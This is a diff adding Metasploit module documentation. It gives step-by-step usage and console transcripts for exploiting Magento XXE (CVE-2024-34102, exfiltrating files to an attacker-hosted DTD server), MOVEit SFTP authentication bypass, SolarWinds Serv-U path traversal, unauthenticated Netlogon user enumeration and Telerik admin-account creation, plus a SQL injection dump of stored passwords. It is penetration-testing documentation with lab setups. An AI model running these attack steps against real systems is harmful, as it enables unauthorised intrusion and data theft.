+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(machine_name,''),ifnull(computer_user,''),ifnull(ip,''),ifnull(systemid,''),ifnull(password,'')) as binary)) from victims)
+[*] {SQLi} Time-based injection: expecting output of length 428
+[+] Dumped table contents:
+Victims
+=======
+
+ machine_name     computer_user  ip              systemid                  password
+ ------------     -------------  --              --------                  --------
+ Bollywood        Salman Khan    47.247.223.177  df545f454f5d4f5d4af5      M9M99EvNpZVOWpy9Q8sZLHEP
+ DESKTOP-37Q74QH  cyberstair     47.247.223.177  96457DF79A87C7C0008A7BE7  xAS4NinH/HQKNJwsNtTWN5yD
+ FiFa             Leone Messi    47.247.223.177  cfhsfkdjkfvdd454s5g4      JDNAaz6e3oyM8cN+AGFdMl/5
+ Indian Cricket   Virat Kohli    47.247.223.177  SDGFs4F4S4FD4F4545fs      3tIHrYJqqTSBpw4lgMMck1GD
+ White House      Donald Trump   47.247.223.177  fgighefesdgvrd5g45rd4h    RJtCd9QqiCfBaSU0zQf84dvd
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
@@ -28,20 +28,25 @@ msf5 auxiliary(gather/ldap_hashdump) > options

 Module options (auxiliary/gather/ldap_hashdump):

-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   BASE_DN                     no        LDAP base DN if you already have it
-   BIND_DN                     no        The username to authenticate to LDAP server
-   BIND_PW                     no        Password for the BIND_DN
-   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
-   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      1389             yes       The target port
-   SSL        false            no        Enable SSL on the LDAP connection
-   USER_ATTR  dn               no        LDAP attribute, that contains username
-
-
-Auxiliary action:
+   Name          Current Setting                                        Required  Description
+   ----          ---------------                                        --------  -----------
+   BASE_DN                                                              no        LDAP base DN if you already have it]
+   DOMAIN                                                               no        The domain to authenticate to
+   MAX_LOOT                                                             no        Maximum number of LDAP entries to loot
+   PASSWORD                                                             no        The password to authenticate with
+   PASS_ATTR     userPassword, sambantpassword, sambalmpassword, mailu  yes       LDAP attribute, that contains password hashes
+                 serpassword, password, pwdhistory, passwordhistory, c
+                 learpassword
+   READ_TIMEOUT  600                                                    no        LDAP read timeout in seconds
+   RHOSTS        127.0.0.1                                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                                                                  tml
+   RPORT         1389                                                   yes       The target port
+   SSL           true                                                   no        Enable SSL on the LDAP connection
+   THREADS       1                                                      yes       The number of concurrent threads (max one per host)
+   USERNAME                                                             no        The username to authenticate with
+   USER_ATTR     dn                                                     no        LDAP attribute(s), that contains username

+                                                                                                                                                                                           Auxiliary action:
   Name  Description
   ----  -----------
   Dump  Dump all LDAP data
@@ -214,23 +214,33 @@ QUERY_FILE_PATH => /home/gwillcox/git/metasploit-framework/test.yaml
 msf6 auxiliary(gather/ldap_query) > show options

 Module options (auxiliary/gather/ldap_query):
-
-   Name             Current Setting                     Required  Description
-   ----             ---------------                     --------  -----------
-   BASE_DN                                              no        LDAP base DN if you already have it
-   BIND_DN          normal@daforest.com                 no        The username to authenticate to LDAP server
-   BIND_PW          thePassword123                      no        Password for the BIND_DN
-   OUTPUT_FORMAT    table                               yes       The output format to use (Accepted: csv, table, json)
-   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-fram  no        Path to the JSON or YAML file to load and run queries from
-                    ework/test.yaml
-   RHOSTS           172.27.51.83                        yes       The target host(s), see https://github.com/rapid7/metasploit-f
-                                                                  ramework/wiki/Using-Metasploit
-   RPORT            389                                 yes       The target port
-   SSL              false                               no        Enable SSL on the LDAP connection
+                                                                                                                                                                                              Name             Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   DOMAIN                              no        The domain to authenticate to
+   OUTPUT_FORMAT  table                yes       The output format to use (Accepted: csv, table, json)
+   PASSWORD       thePassword123       no        The password to authenticate with
+   RHOSTS         172.27.51.83         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+   USERNAME       normal@daforest.com  no        The username to authenticate with


-Auxiliary action:
+   When ACTION is RUN_QUERY_FILE:

+   Name             Current Setting                                    Required  Description
+   ----             ---------------                                    --------  -----------
+   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-framework/test.yaml  no        Path to the JSON or YAML file to load and run queries from
+
+
+   When ACTION is RUN_SINGLE_QUERY:
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   QUERY_ATTRIBUTES                   no        Comma separated list of attributes to retrieve from the server
+   QUERY_FILTER                       no        Filter to send to the target LDAP server to perform the query
+
+                                                                                                                                                                                           Auxiliary action:
   Name            Description
   ----            -----------
   RUN_QUERY_FILE  Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
@@ -0,0 +1,159 @@
+## Vulnerable Application
+
+### Description
+
+An unauthenticated user can read arbritraty file from Magento Community edition version 2.4.0 to 2.4.3.
+The vulnerability is due to the lack of input validation in the XML file. An attacker can exploit this
+vulnerability by sending a specially crafted XML file to the target server. The attacker can read any file on the server.
+
+On June 27, 2024, Adobe released a software update that addressed this vulnerability (CVE-2024-34102).
+
+The following products are affected:
+
+- Adobe Commerce: versions before:      2.4.7; 2.4.6-p5; 2.4.5-p7; 2.4.4-p8; 2.4.3-ext-7 ; 2.4.2-ext-7
+- Magento Open Source: versions before: 2.4.7; 2.4.6-p5; 2.4.5-p7; 2.4.4-p8
+- Adobe Commerce Webhooks Plugin: versions 1.2.0 to 1.4.0
+
+### Exploitation
+
+This module exploits the XXE vulnerability in Magento by following these steps:
+
+- Creating a DTD File: This file includes entities that will read and encode `FILE`, then send it to your endpoint.
+
+- Host the DTD File: Serve the dtd.xml file, accessible via HTTP `SRVHOST` on port `SRVPORT`.
+
+- Craft the HTTP Request: Craft the XML payload which will include the DTD file hosted on your server.
+
+- Execute a HTTP Request: Send the crafted XML payload to the target server.
+
+- Capture the Exfiltrated Data: The exfiltrated data will be sent back to the attacker in a HTTP GET request and them saved in the loot.
+
+
+
+### Setup
+
+Create a `docker-compose.yml` file as below:
+
+```yml
+version: '2'
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_magento
+      - MARIADB_DATABASE=bitnami_magento
+    volumes:
+      - 'mariadb_data:/bitnami/mariadb'
+  magento:
+    image: docker.io/bitnami/magento:2
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - MAGENTO_HOST=localhost
+      - MAGENTO_DATABASE_HOST=mariadb
+      - MAGENTO_DATABASE_PORT_NUMBER=3306
+      - MAGENTO_DATABASE_USER=bn_magento
+      - MAGENTO_DATABASE_NAME=bitnami_magento
+      - ELASTICSEARCH_HOST=elasticsearch
+      - ELASTICSEARCH_PORT_NUMBER=9200
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'magento_data:/bitnami/magento'
+    depends_on:
+      - mariadb
+      - elasticsearch
+  elasticsearch:
+    image: docker.io/bitnami/elasticsearch:7
+    volumes:
+      - 'elasticsearch_data:/bitnami/elasticsearch/data'
+volumes:
+  mariadb_data:
+    driver: local
+  magento_data:
+    driver: local
+  elasticsearch_data:
+    driver: local
+```
+
+Run the below command to create the container:
+
+```
+$ docker-compose up
+```
+
+
+## Verification Steps
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+### TARGETURI (required)
+
+The path to the Magento (Default: `/`).
+
+### SRVHOST (required)
+
+The local IP address to listen on. This must be a routable IP address on the local machine (0.0.0.0 is invalid). 
+
+### SRVPORT (required)
+
+The local port to listen on.
+
+## Scenarios
+
+### Docker container running Magento Community edition version 2.4
+
+```
+Module options (exploit/multi/http/magento_xxe_cve_2024_34102):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   FILE       /etc/passwd      yes       The file to read
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    192.168.128.1    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to the web application
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST      localhost        no        HTTP server virtual host
+```
+
+```   
+msf6 exploit(multi/http/magento_xxe_cve_2024_34102) > 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Using URL: http://192.168.128.1:8080/
+[*] Sending XXE request
+[*] Received request for DTD file from 192.168.144.4
+[+] Received file /etc/passwd content
+[+] File saved in: /home/redwaysecurity/.msf4/loot/20240715171929_default_127.0.0.1_etcpasswd_069426.txt
+
+msf6 exploit(multi/http/magento_xxe_cve_2024_34102) > cat /home/redwaysecurity/.msf4/loot/20240715171929_default_127.0.0.1_etcpasswd_069426.txt
+[*] exec: cat /home/redwaysecurity/.msf4/loot/20240715171929_default_127.0.0.1_etcpasswd_069426.txt
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+msf6 exploit(multi/http/magento_xxe_cve_2024_34102) > 
+```
@@ -0,0 +1,96 @@
+## Vulnerable Application
+This module exploits CVE-2024-5806, an authentication bypass vulnerability in the MOVEit Transfer SFTP service. The
+following version are affected:
+
+* MOVEit Transfer 2023.0.x (Fixed in 2023.0.11)
+* MOVEit Transfer 2023.1.x (Fixed in 2023.1.6)
+* MOVEit Transfer 2024.0.x (Fixed in 2024.0.2)
+
+The module can establish an authenticated SFTP session for a MOVEit Transfer user. The module allows for both listing
+the contents of a directory, and the reading of an arbitrary file.
+
+Read our AttackerKB [Rapid7 Analysis](https://attackerkb.com/topics/44EZLG2xgL/cve-2024-5806/rapid7-analysis)
+for a full technical description of both the vulnerability and exploitation.
+
+## Testing
+1. Installation requires a valid trial license that can be obtained by going here:
+   https://www.ipswitch.com/forms/free-trials/moveit-transfer
+2. Ensure that your computer has internet access for the license to activate and double-click the installer.
+3. Follow installation instructions for an evaluation installation.
+4. After the installation completes, follow the instructions to create an sysadmin user.
+5. Log in as the sysadmin and create a new Organization (e.g. `TestOrg`).
+6. In the `Home` section, click the "Act as administrator in the TestOrg organization" button.
+7. In the `Users` section, create a new normal user (e.g. `testuser1`) in the new Organization.
+8. In the `Folders` section, navigate to the `testuser1` Home folder and create some files and folders.
+9. The SFTP service will be running by default. No further configuration is required.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set STORE_LOOT false`
+5. `set TARGETUSER <TARGET_USERNAME>` (Must be a valid username on the target server, for example `testuser1`)
+6. `set TARGETFILE /`
+7. `check`
+8. `run`
+
+## Options
+
+### STORE_LOOT
+Whether the read file's contents should be stored as loot in the Metasploit database. If set to false, the files
+content will be displayed in the console. (default: true).
+
+### TARGETUSER
+A valid username to authenticate as. (default: nil).
+
+### TARGETFILE
+The full path of a target file or directory to read. If a directory path is specified, the output will be the
+directories contents. If a file path is specified, the output will be the files contents. In order to learn
+what files you can read, you can first read the root directories (/) contents. (default: /).
+
+## Scenarios
+
+### Default
+
+```
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > set RHOST 169.254.180.121
+RHOST => 169.254.180.121
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > set STORE_LOOT false
+STORE_LOOT => false
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > set TARGETUSER testuser1
+TARGETUSER => testuser1
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > show options
+
+Module options (auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   RHOSTS      169.254.180.121  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       22               yes       The target port
+   STORE_LOOT  false            no        Store the target file as loot
+   TARGETFILE  /                yes       The full path of a target file or directory to read.
+   TARGETUSER  testuser1        yes       A valid username to authenticate as.
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > run
+[*] Running module against 169.254.180.121
+
+[*] Authenticating as: testuser1@169.254.180.121:22
+[*] Listing directory: /
+dr-xr-xr-x 1 0 0 0 Jun 23 16:19 /Home/
+dr-xr-xr-x 1 0 0 0 Jun 18 22:50 /Home/testuser1/
+dr-xr-xr-x 1 0 0 0 Jun 18 22:50 /Home/testuser1/TestFolder1/
+-rw-rw-rw- 1 0 0 8 Jun 18 22:50 /Home/testuser1/test.txt
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > run TARGETFILE=/Home/testuser1/test.txt
+[*] Running module against 169.254.180.121
+
+[*] Authenticating as: testuser1@169.254.180.121:22
+[*] Downloading file: /Home/testuser1/test.txt
+secrets!
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > 
+```
@@ -0,0 +1,201 @@
+## Vulnerable Application
+This module exploits an unauthenticated file read vulnerability, due to directory traversal, affecting
+SolarWinds Serv-U FTP Server 15.4, Serv-U Gateway 15.4, and Serv-U MFT Server 15.4. All versions prior to
+the vendor supplied hotfix "15.4.2 Hotfix 2" (version 15.4.2.157) are affected.
+
+For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis).
+
+## Testing
+Follow the below instruction for either Linux or Windows.
+* Download a vulnerable version of SolarWinds Serv-U MFT Server, for example version `15.4.2.126`.
+* Install the Serv-U Server by running the installer binary and accepting the defaults for every setting.
+* Log into the Serv-U Server Management Console, and create a new Serv-U Domain. Follow the instruction and
+accept the default values during setup. The newly created domain will expose a HTTP and HTTPS service bound to all
+interfaces. These are the `RHOST`, `RPORT`, and `SSL` options we set in the auxiliary module.
+
+To read a file we set the `TARGETFILE` option to the absolute path of the file we want to read. For example on Linux
+we can set the target file to `/etc/passwd`, or on Windows to `C:\\Windows\win.ini`.
+
+Note: When using `msfconsole` you will need to escape a backslash (`\ `) with a double backslash (`\\`).
+
+On Windows, by default, the install directory is `C:\ProgramData\RhinoSoft\Serv-U\ ` and the `Serv-U.exe` service runs
+as the `NT AUTHORITY\NETWORK SERVICE` user.
+
+On Linux, by default, the install directory is `/usr/local/Serv-U/` and the `Serv-U` service runs as `root`.
+The file `/usr/local/Serv-U/Shares/Serv-U.FileShares` is a SQLite database containing the absolute path of all files
+shared by Serv-U, and can be downloaded and used for target file discovery. This database file is not accessible on a
+Windows target, as it is locked by the `Serv-U.exe` process and cannot be opened a second time.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set STORE_LOOT false`
+5. `set TARGETFILE /etc/passwd`
+6. `check`
+7. `run`
+
+## Options
+
+### STORE_LOOT
+Whether the read file's contents should be stored as loot in the Metasploit database. If set to false, the files
+content will be displayed in the console. (default: true).
+
+### TARGETURI
+The base URI path to the web application (default: /).
+
+### TARGETFILE
+The absolute path of a target file to read (default: /etc/passwd).
+
+### PATH_TRAVERSAL_COUNT
+The number of double dot (..) path segments needed to traverse to the root folder. For a default install of Serv-U
+on both Linux and Windows, the value for this is 4. (default: 4).
+
+## Scenarios
+
+### A vulnerable Linux target
+
+```
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RHOST 192.168.86.43
+RHOST => 192.168.86.43
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RPORT 443
+RPORT => 443
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set STORE_LOOT false
+STORE_LOOT => false
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set TARGETFILE /etc/passwd
+TARGETFILE => /etc/passwd
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > show options
+
+Module options (auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995):
+
+   Name                  Current Setting  Required  Description
+   ----                  ---------------  --------  -----------
+   PATH_TRAVERSAL_COUNT  4                yes       The number of double dot (..) path segments needed to traverse to the root folder.
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT                 443              yes       The target port (TCP)
+   SSL                   true             no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT            false            no        Store the target file as loot
+   TARGETFILE            /etc/passwd      yes       The full path of a target file to read.
+   TARGETURI             /                yes       The base URI path to the web application
+   VHOST                                  no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > check
+[+] 192.168.86.43:443 - The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Linux 64-bit; Version: 6.5.0-15-generic)
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > run
+[*] Running module against 192.168.86.43
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Linux 64-bit; Version: 6.5.0-15-generic)
+[*] Reading file /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+syslog:x:104:111::/home/syslog:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
+uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
+systemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
+tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
+avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+avahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
+cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+rtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin
+whoopsie:x:117:124::/nonexistent:/bin/false
+sssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
+speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+nm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+saned:x:121:128::/var/lib/saned:/usr/sbin/nologin
+colord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
+pulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
+hplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false
+gdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
+mysql:x:128:136:MySQL Server,,,:/nonexistent:/bin/false
+fwupd-refresh:x:129:137:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
+xrdp:x:130:138::/run/xrdp:/usr/sbin/nologin
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > 
+```
+
+### A vulnerable Windows target
+
+```
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RHOST 192.168.86.68
+RHOST => 192.168.86.68
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RPORT 80
+RPORT => 80
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set TARGETFILE c:\\\\Windows\\win.ini
+TARGETFILE => c:\\Windows\win.ini
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > show options 
+
+Module options (auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995):
+
+   Name                  Current Setting      Required  Description
+   ----                  ---------------      --------  -----------
+   PATH_TRAVERSAL_COUNT  4                    yes       The number of double dot (..) path segments needed to traverse to the root folder.
+   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                192.168.86.68        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT                 80                   yes       The target port (TCP)
+   SSL                   false                no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT            false                no        Store the target file as loot
+   TARGETFILE            c:\\Windows\win.ini  yes       The full path of a target file to read.
+   TARGETURI             /                    yes       The base URI path to the web application
+   VHOST                                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > check
+[+] 192.168.86.68:80 - The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Windows Server 2012 64-bit; Version: 6.2.9200)
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > run
+[*] Running module against 192.168.86.68
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Windows Server 2012 64-bit; Version: 6.2.9200)
+[*] Reading file c:\\Windows\win.ini
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) >
+```
@@ -39,14 +39,15 @@ If you already have the LDAP base DN, you may set it in this option.
 msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options

-Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   BASE_DN                   no        LDAP base DN if you already have it
-   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT    636              yes       The target port
-   SSL      true             no        Enable SSL on the LDAP connection
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   BASE_DN                    no        LDAP base DN if you already have it
+   DOMAIN                     no        The domain to authenticate to
+   PASSWORD                   no        The password to authenticate with
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     636              yes       The target port
+   SSL       true             no        Enable SSL on the LDAP connection
+   USERNAME                   no        The username to authenticate with


 Auxiliary action:
@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+A new method for gathering domain users. The method leverages auth-level = 1 (No authentication) against the
+MS-NRPC (Netlogon) interface on domain controllers. All that's required is the domain controller's IP address,
+and the entire process can be completed without providing any credentials.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/nrpc_enumusers`
+2. Do: `set RHOSTS <targer IP addresses>`
+3. Do: `set USER_FILE <path to your users list>`
+4. Do: `run`
+
+
+## Target
+
+To use nrpc_enumusers, make sure you are able to connect to the Domain Controller.
+It has been tested with Windows servers 2012, 2016, 2019 and 2022
+
+## Options
+
+### USER_FILE
+
+**Description:** Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
+
+**Usage:** Provide the path to the file that contains the list of user accounts you want to test.
+
+**Example:** `set USER_FILE /path/to/usernames.txt`
+
+2- `RHOSTS` (required)
+
+**Description:** The target IP address or range of IP addresses of the Domain Controllers.
+
+**Usage:** Specify the IP address or addresses of the Domain Controllers you are targeting.
+
+**Example:** `set RHOSTS 192.168.1.100`
+
+3- `RPORT` (optional)
+
+**Description:** The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
+
+**Usage:** If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.
+
+**Example:** `set RPORT 49664`
+
+## Scenarios
+
+The following demonstrates basic usage, using a custom wordlist,
+targeting a single Domain Controller to identify valid domain user accounts.
+
+Create a new `./users.txt` file, then run the module:
+
+```
+msf6 auxiliary(gather/nrpc_enumusers) > set RHOSTS 192.168.177.177
+RHOSTS => 192.168.177.177
+msf6 auxiliary(gather/nrpc_enumusers) > set USER_FILE users.txt 
+USER_FILE => users.txt
+msf6 auxiliary(gather/nrpc_enumusers) > run
+
+[*] 192.168.177.177: - Connecting to the endpoint mapper service...
+[*] 192.168.177.177: - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.177.177[49664]...
+[-] 192.168.177.177: - Tiffany.Molina does not exist
+[-] 192.168.177.177: - SMITH does not exist
+[-] 192.168.177.177: - JOHNSON does not exist
+[-] 192.168.177.177: - WILLIAMS does not exist
+[-] 192.168.177.177: - Administratorsvc_ldap does not exist
+[-] 192.168.177.177: - svc_ldap does not exist
+[-] 192.168.177.177: - ksimpson does not exist
+[+] 192.168.177.177: - Administrator exists
+[-] 192.168.177.177: - James does not exist
+[-] 192.168.177.177: - nikk37 does not exist
+[-] 192.168.177.177: - svc-printer does not exist
+[-] 192.168.177.177: - SABatchJobs does not exist
+[-] 192.168.177.177: - e.black does not exist
+[-] 192.168.177.177: - Kaorz does not exist
+[*] 192.168.177.177: - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/nrpc_enumusers) >
+```
@@ -0,0 +1,53 @@
+## Vulnerable Application
+This module exploits an authentication bypass vulnerability in Telerik Report Server versions 10.0.24.305 and
+prior which allows an unauthenticated attacker to create a new account with administrative privileges. The
+vulnerability leverages the initial setup page which is still accessible once the setup process has completed.
+
+If either USERNAME or PASSWORD are not specified, then a random value will be selected. The module will fail if
+the specified USERNAME already exists.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/telerik_report_server_auth_bypass`
+1. Set the `RHOSTS` option
+1. Do: `run`
+
+## Options
+
+### USERNAME
+Username for the new account. A random value will be used unless specified.
+
+### PASSWORD
